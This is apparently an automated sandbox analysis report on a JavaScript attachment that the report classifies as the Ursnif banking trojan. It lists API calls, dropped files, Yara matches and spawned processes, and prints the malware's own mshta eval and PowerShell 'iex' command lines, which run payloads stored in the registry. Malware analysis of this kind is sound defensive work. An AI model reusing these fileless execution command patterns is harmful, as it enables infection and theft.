Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functionsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00401652 NtMapViewOfSection,5_2_00401652
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040113E GetProcAddress,NtCreateSection,memset,5_2_0040113E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00402765 NtQueryVirtualMemory,5_2_00402765
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_050775B3 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,5_2_050775B3
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05075CD8 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,5_2_05075CD8
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0507476B RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,5_2_0507476B
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0507668C NtMapViewOfSection,5_2_0507668C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0508CEA7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlExitUserThread,5_2_0508CEA7
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05090170 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,5_2_05090170
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0508A395 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,5_2_0508A395
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_050893CD NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,5_2_050893CD
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0508CA3E GetProcAddress,NtCreateSection,memset,5_2_0508CA3E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05088A30 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,5_2_05088A30
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0508A27A NtQueryInformationProcess,5_2_0508A27A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_050802DF NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,5_2_050802DF
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05074D66 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,5_2_05074D66
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0508C7BD NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,5_2_0508C7BD
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05087933 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,5_2_05087933
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05084968 memset,memcpy,LdrInitializeThunk,NtSetContextThread,RtlNtStatusToDosError,GetLastError,5_2_05084968
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0507A99C NtGetContextThread,RtlNtStatusToDosError,5_2_0507A99C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0508B07A NtQuerySystemInformation,RtlNtStatusToDosError,5_2_0508B07A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_050873D6 memset,NtQueryInformationProcess,5_2_050873D6
Source: C:\Windows\System32\control.exeCode function: 18_2_00364AD0 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,18_2_00364AD0
Source: C:\Windows\System32\control.exeCode function: 18_2_00348AD8 NtSetInformationProcess,CreateRemoteThread,18_2_00348AD8
Source: C:\Windows\System32\control.exeCode function: 18_2_00362DC0 NtQueryInformationProcess,18_2_00362DC0
Source: C:\Windows\System32\control.exeCode function: 18_2_00381000 NtProtectVirtualMemory,NtProtectVirtualMemory,18_2_00381000
Contains functionality to launch a process as a different userShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_050793F0 CreateProcessAsUserA,5_2_050793F0
Detected potential crypto functionShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004025445_2_00402544
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004131AF5_2_004131AF
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05096D185_2_05096D18
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05091D5A5_2_05091D5A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_050915705_2_05091570
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05076F345_2_05076F34
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0507CF555_2_0507CF55
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_050827785_2_05082778
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05083F8C5_2_05083F8C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_050926135_2_05092613
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05082EDE5_2_05082EDE
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_050810DE5_2_050810DE
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0507DB4A5_2_0507DB4A
Source: C:\Windows\System32\control.exeCode function: 18_2_003679AC18_2_003679AC
Source: C:\Windows\System32\control.exeCode function: 18_2_0036555018_2_00365550
Source: C:\Windows\System32\control.exeCode function: 18_2_0034682C18_2_0034682C
Source: C:\Windows\System32\control.exeCode function: 18_2_0034C85018_2_0034C850
Source: C:\Windows\System32\control.exeCode function: 18_2_003558F418_2_003558F4
Source: C:\Windows\System32\control.exeCode function: 18_2_0034812818_2_00348128
Source: C:\Windows\System32\control.exeCode function: 18_2_0034D17818_2_0034D178
Source: C:\Windows\System32\control.exeCode function: 18_2_0036F94418_2_0036F944
Source: C:\Windows\System32\control.exeCode function: 18_2_0034D9B018_2_0034D9B0
Source: C:\Windows\System32\control.exeCode function: 18_2_003411A018_2_003411A0
Source: C:\Windows\System32\control.exeCode function: 18_2_003471CC18_2_003471CC
Source: C:\Windows\System32\control.exeCode function: 18_2_0036F21418_2_0036F214
Source: C:\Windows\System32\control.exeCode function: 18_2_0036AA0C18_2_0036AA0C
Source: C:\Windows\System32\control.exeCode function: 18_2_0034A2B418_2_0034A2B4
Source: C:\Windows\System32\control.exeCode function: 18_2_00342AB518_2_00342AB5
Source: C:\Windows\System32\control.exeCode function: 18_2_0036DA9418_2_0036DA94
Source: C:\Windows\System32\control.exeCode function: 18_2_00349B3418_2_00349B34
Source: C:\Windows\System32\control.exeCode function: 18_2_0035231818_2_00352318
Source: C:\Windows\System32\control.exeCode function: 18_2_0036935818_2_00369358
Source: C:\Windows\System32\control.exeCode function: 18_2_00353B9418_2_00353B94
Source: C:\Windows\System32\control.exeCode function: 18_2_0036DB9018_2_0036DB90
Source: C:\Windows\System32\control.exeCode function: 18_2_0036B3F018_2_0036B3F0
Source: C:\Windows\System32\control.exeCode function: 18_2_0035F3CC18_2_0035F3CC
Source: C:\Windows\System32\control.exeCode function: 18_2_00366C2C18_2_00366C2C
Source: C:\Windows\System32\control.exeCode function: 18_2_0034B47418_2_0034B474
Source: C:\Windows\System32\control.exeCode function: 18_2_00357C7018_2_00357C70
Source: C:\Windows\System32\control.exeCode function: 18_2_0035BC5C18_2_0035BC5C
Source: C:\Windows\System32\control.exeCode function: 18_2_00352C5818_2_00352C58
Source: C:\Windows\System32\control.exeCode function: 18_2_0036A52018_2_0036A520
Source: C:\Windows\System32\control.exeCode function: 18_2_0036E52018_2_0036E520
Source: C:\Windows\System32\control.exeCode function: 18_2_00350D0818_2_00350D08
Source: C:\Windows\System32\control.exeCode function: 18_2_0036CD4818_2_0036CD48
Source: C:\Windows\System32\control.exeCode function: 18_2_0036FE6018_2_0036FE60
Source: C:\Windows\System32\control.exeCode function: 18_2_0034264418_2_00342644
Source: C:\Windows\System32\control.exeCode function: 18_2_0035CE4018_2_0035CE40
Source: C:\Windows\System32\control.exeCode function: 18_2_00368E4018_2_00368E40
Source: C:\Windows\System32\control.exeCode function: 18_2_00362EBC18_2_00362EBC
Source: C:\Windows\System32\control.exeCode function: 18_2_0034FE8818_2_0034FE88
Source: C:\Windows\System32\control.exeCode function: 18_2_00365EFC18_2_00365EFC
Source: C:\Windows\System32\control.exeCode function: 18_2_0036BECC18_2_0036BECC
Source: C:\Windows\System32\control.exeCode function: 18_2_0036873C18_2_0036873C
Source: C:\Windows\System32\control.exeCode function: 18_2_003707B818_2_003707B8
Source: C:\Windows\System32\control.exeCode function: 18_2_00346F8418_2_00346F84
Source: C:\Windows\System32\control.exeCode function: 18_2_0035FFF018_2_0035FFF0
Source: C:\Windows\System32\control.exeCode function: 18_2_0036DFC418_2_0036DFC4
Dropped file seen in connection with other malwareShow sources
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\TsCrxrp.txt 9853CB779F41A206FBEDC4F79AE92621F6B9E4234C8E88570CAD9EA97B9435FD
Java / VBScript file with very long strings (likely obfuscated code)Show sources
Source: open_attach_p2y.jsInitial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Tries to load missing DLLsShow sources
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)Show sources
Source: TsCrxrp.txt.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.evad.winJS@19/19@4/1
Contains functionality to enum processes or threadsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05086887 CloseHandle,LdrInitializeThunk,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,5_2_05086887
Creates files inside the user directoryShow sources
Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\Jump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{BF22DA4C-12D1-49BD-1463-668D8847FA11}
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1464:120:WilError_01
Source: C:\Windows\SysWOW64\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\{5F80CF80-3252-E90B-3403-862DA8E71AB1}
Creates temporary filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\zwpCU.yVwpxaMJump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Reads ini filesShow sources
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: open_attach_p2y.jsVirustotal: Detection: 28%
Source: open_attach_p2y.jsReversingLabs: Detection: 25%
Sample might require command line argumentsShow sources
Source: regsvr32.exeString found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\open_attach_p2y.js'
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\TsCrxrp.txt
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\TsCrxrp.txt
Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5076 CREDAT:17410 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5076 CREDAT:82950 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5076 CREDAT:17432 /prefetch:2
Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\TsCrxrp.txtJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\TsCrxrp.txtJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5076 CREDAT:17410 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5076 CREDAT:82950 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5076 CREDAT:17432 /prefetch:2Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Reads internet explorer settingsShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Submission file is bigger than most known malware samplesShow sources
Source: open_attach_p2y.jsStatic file information: File size 3544719 > 1048576
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000013.00000002.1086254761.000000000D160000.00000002.00000001.sdmp
Source: Binary string: c:\exercise\Study\just\month\fraction\shortBorn.pdb source: wscript.exe, 00000000.00000003.605060543.00000175BB621000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.961453332.000000000041A000.00000002.00020000.sdmp, TsCrxrp.txt.0.dr
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000005.00000003.932108622.0000000005E60000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000005.00000003.932108622.0000000005E60000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000013.00000002.1086254761.000000000D160000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))Jump to behavior
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05086450 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,5_2_05086450
PE file contains an invalid checksumShow sources
Source: TsCrxrp.txt.0.drStatic PE information: real checksum: 0x31b79 should be: 0x38b9c
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004024E0 push ecx; ret 5_2_004024E9
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00402533 push ecx; ret 5_2_00402543
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004137BD push ecx; ret 5_2_004137D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05096D07 push ecx; ret 5_2_05096D17
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_050969A0 push ecx; ret 5_2_050969A9
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0509BA4E push ds; retn 0002h5_2_0509BA69
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0509BA74 push edx; retn 0002h5_2_0509BA75
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0509BA98 push edx; ret 5_2_0509BAAD
Source: C:\Windows\System32\control.exeCode function: 18_2_0035B849 push 3B000001h; retf 18_2_0035B84E
Binary may include packed or encrypted codeShow sources
Source: initial sampleStatic PE information: section name: .text entropy: 6.81480463595

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\TsCrxrp.txtJump to dropped file
Drops files with a non-matching file extension (content does not match file extension)Show sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\TsCrxrp.txtJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000005.00000003.810195397.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.923006439.00000000056B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.968635688.0000000005070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.810012568.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809504976.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.810318612.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809358127.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000003.937070436.000002A0B34C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.838670762.000000000533B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.810276676.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1086943730.000000000037E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809661520.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809089457.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4888, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 1784, type: MEMORY
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
